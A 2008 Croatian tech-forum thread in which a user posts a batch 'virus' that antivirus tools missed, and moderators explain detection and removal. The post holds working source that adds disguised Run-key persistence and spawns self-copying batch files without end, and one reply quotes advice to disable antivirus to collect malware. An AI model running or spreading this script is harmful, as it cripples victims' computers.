Virus ili ne???? (Sigurnosni softver) @ Bug.hr Forum

Kizmar

17 godina

neaktivan

offline

ned 25.5.2008 23:33

Odgovori Citiraj

Virus ili ne????

Ovako malo sam surfao internet i trazio viruse da ih skinem:-) i da provjerim svoj nod32 i nabasao na jedan.

Stavit cu ovdje njegov kod:

--------------------------------------------------------

@echo off
del C:\1.reg
>>"C:\1.reg" ECHO Windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1

start C:\2.bat

-----------------------------------------------------------------

Ovo unutar linija se treba spremit pomocu Notepada ili bilo kojeg tekst procesora negdje na disk a sam naziv treba imati nastavak .bat.

Sad mene zanima kad sam ja stvorio taj virus na racunalo nod32 me nije nista upozorio a legalan je i updatan. Poslao sam i taj stvoren virus na kaspersky-ev online skener i on nije nista nasao. Uglavnom kad sam pokrenuo (dobrovoljno, zvuci malo glupo al sta je tu je) taj virus, on je poceo umnozavat nekakve prozore te na kraju srusio cjeli sistem. Nakon ponovnog pokretanja dogodila se ista stvar. Ja sam ga lagano izbrisao iz safe moda (rasiro je po raznim direktorijima svoje krake te se zapisao u start up). Međutim mene zanima ako je to virus a ocito neka vrsta malicioznog koda jest zasto ga nod32 ili kaspersky nisu kao takvog svrstavali?

Uput da upozorim korisnike ako nisu vjesti sa brisanje virusa rucno neka ne stvaraju taj virus kao ja:))

P.S.

I da, jel neko vidi iz ovog koje je sve datoteke virus stvorio na mom racunalu i gdje su locirane, za svaki slucaj ako ih nisam sve izbrisao.

Lupam glavom u radio

Poruka je uređivana zadnji put ned 25.5.2008 23:41 (Kizmar).

trajni link

0 0

mbaksa

17 godina

moderator

online

pon 26.5.2008 0:08

Odgovori Citiraj

RE: Virus ili ne????

Kizmar kaže...

Ovako malo sam surfao internet i trazio viruse da ih skinem:-) i da provjerim svoj nod32 i nabasao na jedan.

Prvo moras nauciti sto je virus, sto antivirusni program i na koji nacin antivirusni program nesto prepoznaje kao virus. Uglavnom, test ti je totalni promasaj, ne zbog toga jer taj "virus" nisu nasli ni NOD32 niti Kaspersky nego zbog toga sto ga zapravo ni nisu trebali naci. Eventualno bi na tu .bat datoteku mogao reagirati neki antivirusni program s heuristickim skeniranjem postavljenim na najosjetljvije - iako je i to vrlo upitno.

Neke informacije mozes pokupit vec i s Wikipedije.

trajni link nadporuka

0 0

Lazarus Long

17 godina

neaktivan

moderator

offline

pon 26.5.2008 1:48

Odgovori Citiraj

RE: Virus ili ne????

Proveri taj "virus" na strani Virus Total

Doticna strana,ako se ne varam skenira fajlove sa preko 20 antivirusnih programa istovremeno (ukljucceni su svi poznati antivirusi,AVG,Symantec,NOD,Kaspersky itd.)

P1 200 Mhz RAM 32Mb Hdd 500 Mb Win 98 (i jako sam sretan)

trajni link nadporuka

0 0

mbaksa

17 godina

moderator

online

pon 26.5.2008 2:07

Odgovori Citiraj

RE: Virus ili ne????

Lazarus Long kaže...

Proveri taj "virus" na strani Virus Total

Doticna strana,ako se ne varam skenira fajlove sa preko 20 antivirusnih programa istovremeno (ukljucceni su svi poznati antivirusi,AVG,Symantec,NOD,Kaspersky itd.)

Ni jedan ga od antivirusnih program na toj stranici, posve ocekivano, ne prepoznaje kao virus.

trajni link nadporuka

0 0

Kizmar

17 godina

neaktivan

offline

pon 26.5.2008 9:35

Odgovori Citiraj

RE: Virus ili ne????

mbaksa kaže...

Kizmar kaže...

Ovako malo sam surfao internet i trazio viruse da ih skinem:-) i da provjerim svoj nod32 i nabasao na jedan.

Prvo moras nauciti sto je virus, sto antivirusni program i na koji nacin antivirusni program nesto prepoznaje kao virus. Uglavnom, test ti je totalni promasaj, ne zbog toga jer taj "virus" nisu nasli ni NOD32 niti Kaspersky nego zbog toga sto ga zapravo ni nisu trebali naci. Eventualno bi na tu .bat datoteku mogao reagirati neki antivirusni program s heuristickim skeniranjem postavljenim na najosjetljvije - iako je i to vrlo upitno.

Neke informacije mozes pokupit vec i s Wikipedije.

Ne znam jesi li ti pokrenuo doticnu datoteku ili ne, ali kad sam je ja pokrenuo racunalo mi je malo prolupalo. Znaci zanima me ako to nije (kao što ti ocito tvrdis) virus i ako taj kod nije zlocudan, što je i čemu služi.

trajni link nadporuka

0 0

Dado_ZG78

17 godina

neaktivan

offline

pon 26.5.2008 10:04

Odgovori Citiraj

RE: Virus ili ne????

Mislim kako se ne bi smio igrati s takvim kodom dok malo ne proučiš programske jezike i općenito skripte, viruse i sl. Nema ti smisla da nešto pokušavaš napraviti kako bi vidio što radi, a ne razumiješ se niti u osnovne principe tog područja. To tije kao da se ja sad odem igrati u tvornicu procesora ili grafičkih čipova i malo pokretati tamo strojeve da vidim 'kako to radi'

Prouči malo materiju, informiraj se na netu, pa onda čeprkaj po virusima

Intel Core2 Duo E8400 6MB, 4GB OCZ Gold 800Mhz, Gainward GF8800GTS 640MB, Gigabyte X38-DS4 Ultra Durable 2

Moj PC

trajni link nadporuka

0 0

Kizmar

17 godina

neaktivan

offline

pon 26.5.2008 11:52

Odgovori Citiraj

Virus ili ne????

Svjestan sam toga, ali kao sto i ti znas metoda pokušaja, promašaja i ponovnih pokušaja se pokazala kao najučinkovitija u cjelokupnoj povjesti čovječanstva.

Lupam glavom u radio

trajni link

0 0

mbaksa

17 godina

moderator

online

pon 26.5.2008 13:23

Odgovori Citiraj

RE: Virus ili ne????

Kizmar kaže...

Ne znam jesi li ti pokrenuo doticnu datoteku ili ne, ali kad sam je ja pokrenuo racunalo mi je malo prolupalo.

LOL! Za razliku od nekih ovdje, ja znam sto su batch skripte (one s nastavkom .bat) i ne trebam pokretati .bat skriptu da bih znao sto ona radi.

Kizmar kaže...

Znaci zanima me ako to nije (kao što ti ocito tvrdis) virus i ako taj kod nije zlocudan, što je i čemu služi.

Sad vidim da ili nisi uopce procitao clanak na Wikipediji ili nisi citao s razumijevanjem. Citirat cu vazni dio:

Antivirus software typically uses two different approaches to accomplish this:

* examining (scanning) files to look for known viruses matching definitions in a virus dictionary, and
* identifying suspicious behavior from any computer program which might indicate infection.

Sto znaci prva tocka? Pojednostavljeno znaci da je netko na svom racunalu uocio da mu neki program radi gluposti, usporedio je datoteku s originalnom i na taj nacin dobio kod virusa iz te datoteke (dakle, ono sto nije u originalnoj datoteci je dio koda virusa). Dio koda virusa prema kojem je moguce prepoznati virus naziva se 'definicija virusa' i stavlja se u antivirusni program, u njegov 'rjecnik'. Antivirusni program prilikom skeniranja provjerava nalazi li se u datoteci bilo koja definicija virusa koju ima u svom rjecniku - ako se nalazi, kaze da je ta datoteka inficirana. Je li ti sad jasno zasto ni jedan antivirusni program ne prepoznaje tu datoteku kao virus?

Druga tocka se odnosi na heuristicko skeniranje i kao sto rekoh malo je vjerojatno da bi neki antivirusni program reagirao na takvu .bat datoteku.

Sto taj "virus" radi? Napravi datoteku c:\1.reg s vrijednostima koji govore Windowsima koji ce se programi pokrenuti kad se Windowsi pokrenu - to ce biti datoteke 1.bat, 2.bat i 3.bat smjestene u korijenskoj mapi diska C i u podmapi Windows. Zatim se datoteka c:\1.reg importira u Windowsov registry - bez toga od nje ne bi bilo nikakve "koristi".

Zatim se kreira datoteka 2.bat koja ce kopirat sebe u datoteke 3.bat, 4.bat itd., i svaku ce od njih pokrenuti - taj postupka unutar 2.bat datoteke (ali i svih onih koje su kopije te datoteke) se odvija unedogled.

E, da - u toj skripti navedene su ti sve datoteke koje ce se kreirati. A osim brisanja tih datoteka treba i iz registryja (Start > Run > regedit pa klik na OK), iz kljuca [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] obrisati MSConfig, MCUpdateExe, explorer, Norton, System i autoexec.

trajni link nadporuka

0 0

mbaksa

17 godina

moderator

online

pon 26.5.2008 13:25

Odgovori Citiraj

RE: Virus ili ne????

Kizmar kaže...

Svjestan sam toga, ali kao sto i ti znas metoda pokušaja, promašaja i ponovnih pokušaja se pokazala kao najučinkovitija u cjelokupnoj povjesti čovječanstva.

Metodu pokusaja i pogresaka si mogao raditi na pisanju vlastitih nemalicioznih skripti pa se bi kad naucis jednostavni skriptni jezik .bat datoteka (u biti upisivanje DOS-ovih naredbi plus neka prosirenja) mogao protumaciti sto neka skripta radi i bez da je pokreces.

trajni link nadporuka

0 0

Kizmar

17 godina

neaktivan

offline

pon 26.5.2008 20:51

Odgovori Citiraj

Virus ili ne????

Zahvaljujem ti na odgovorima i uputama, samo jedino ne razumijem, čemu si se ti kao pojedinac nasao iziritiran mojim pitanjem? Ono je bilo sasvim suvislo i razborito, barem za mene koji nisam stručnjak za tu tematiku.

Lupam glavom u radio

Poruka je uređivana zadnji put pon 26.5.2008 20:54 (Kizmar).

trajni link

0 0

mbaksa

17 godina

moderator

online

pon 26.5.2008 22:49

Odgovori Citiraj

RE: Virus ili ne????

Kizmar kaže...

Zahvaljujem ti na odgovorima i uputama, samo jedino ne razumijem, čemu si se ti kao pojedinac nasao iziritiran mojim pitanjem? Ono je bilo sasvim suvislo i razborito, barem za mene koji nisam stručnjak za tu tematiku.

Ne shvacam gdje ti vidis da si me iziritirao. Nemoj si komentare na forumu toliko uzimati k srcu. Ja direktno odgovaram na pitanja - shvacam da netko to moze shvatiti kao napad na sebe ili kao arogantni komentar, no to je stvar te osobe - nek se prilagodi.

trajni link nadporuka

0 0

Lazarus Long

17 godina

neaktivan

moderator

offline

pon 26.5.2008 23:49

Odgovori Citiraj

RE: Virus ili ne????

Evo ovde mozes testirati svoj antivirus do mile volje

EICAR-The Anti-Virus or Anti-Malware test file

Ili ako pak zelis se stvarno igrati vatre sa virusima preporucujem ovo

If playing with fire, makes your day then this one's for you !

Though NOT advisable, the best way/place to collect virii, is to lower your internet defenses; ie disable your antivirus/ firewall and visit crack/porn sites. You will get a lot of virii, and that too for FREE ! Then run your antivirus and set it to 'quarantine'.

Playing with fire is exciting...but rather dangerous. So be careful.

True, virus collecting has become quite a popular hobby these day.

H. D. Moore, creator of the Metasploit hacking tool, has crafted a search engine that finds malicious software using Google queries. The new "Malware Search Engine" finds Web sites hosting malicious files after a person enters the name of a virus or Trojan horse. To begin with just type ‘a’ and see what you get !!! DONT try this at home...if you are a novice...

These links Fun or Folly? and Why collect Computer Viruses? could be of special interest to virus collectors !

Sretno

btw. Iznenadio sam se kako Ad-Aware 2008 kod mene pronasao nekei viruse i trojane koja ni doticna strana Virus Total ih nije mogla detektirati

(nije ih detektirao niti SpyBot)

Bili so to keygeni u koje se NIS 2007 kleo da nisu opasni

Reakcija NISa 2007 na EICAR

P1 200 Mhz RAM 32Mb Hdd 500 Mb Win 98 (i jako sam sretan)

trajni link nadporuka

0 0

Kizmar

17 godina

neaktivan

offline

čet 29.5.2008 21:54

Odgovori Citiraj

Virus ili ne????

Hvala ti na linkovima, vrlo zanimljivo štivo za procitat, nego ti kolekcionari virusa, za njih prvi put cujem. Čini se kao vrlo zanimljiv hobi iako suvise rizican. Zanima me da li ima koji od kolekcionara virusa ovdje na forumu da mi poblize objasni kako se brine o njima te od kud ih skida i naprosto kako se pravilno postupa sa njima kao dijelom svoje kolekcije.

OKC veteran...

Poruka je uređivana zadnji put čet 29.5.2008 22:00 (Kizmar).

trajni link

0 0

mbaksa

17 godina

moderator

online

pet 30.5.2008 0:05

Odgovori Citiraj

RE: Virus ili ne????

Kizmar kaže...

Hvala ti na linkovima, vrlo zanimljivo štivo za procitat, nego ti kolekcionari virusa, za njih prvi put cujem. Čini se kao vrlo zanimljiv hobi iako suvise rizican. Zanima me da li ima koji od kolekcionara virusa ovdje na forumu da mi poblize objasni kako se brine o njima te od kud ih skida i naprosto kako se pravilno postupa sa njima kao dijelom svoje kolekcije.

Nije to toliko rizican hobi kao sto si mislis. Ja sam si nekad davno, jos u dobra stara vremena DOS-a, znao sacuvati viruse koje sam naisao. Uglavnom, ako virus nije aktivan, ne moze ti nista. Ti mozes na tvrdom disku imati stotine virusa - ako ih ti osobno ili Windowsi ne pokrenete, oni su bezopasni, nema ih u radnoj memoriji, sto je isto kao i da ih uopce nema. Jos se sjecam kakva je fama oko virusa vladala u to vrijeme DOS-a - ispadalo je da je dovoljno da je disketa inficirana i da ako je gurnes u disketnu jedinicu da ce ti virus (tada su bili cesti boot sektor virusi) automatski zaraziti racunalo, sto ne moze biti dalje od istine. Ako si stavio da ti se racunalo uvijek pokrece prvo s tvrdog diska, nema sanse da pokupis virus s boot sektora diskete.

Mislim da danas neki antivirusni programi imaju sandboxove (ili se o tome samo pricalo?) - uglavnom, nesto slicno virtualnom racunalu (kao kod virtualizacije), ali vise ograniceno, pa se unutar sandboxa moze virus (ili datoteka za koju se sumnja da je maliciozna) pokrenuti i vidjeti kako ce se ponasati. Hm... Kad si covjek razmisli, virus bi se mogao pokrenuti i unutar virtualnog racunala koje nema pristup mrezi - tako ne moze napraviti pravu stetu.

trajni link nadporuka

0 0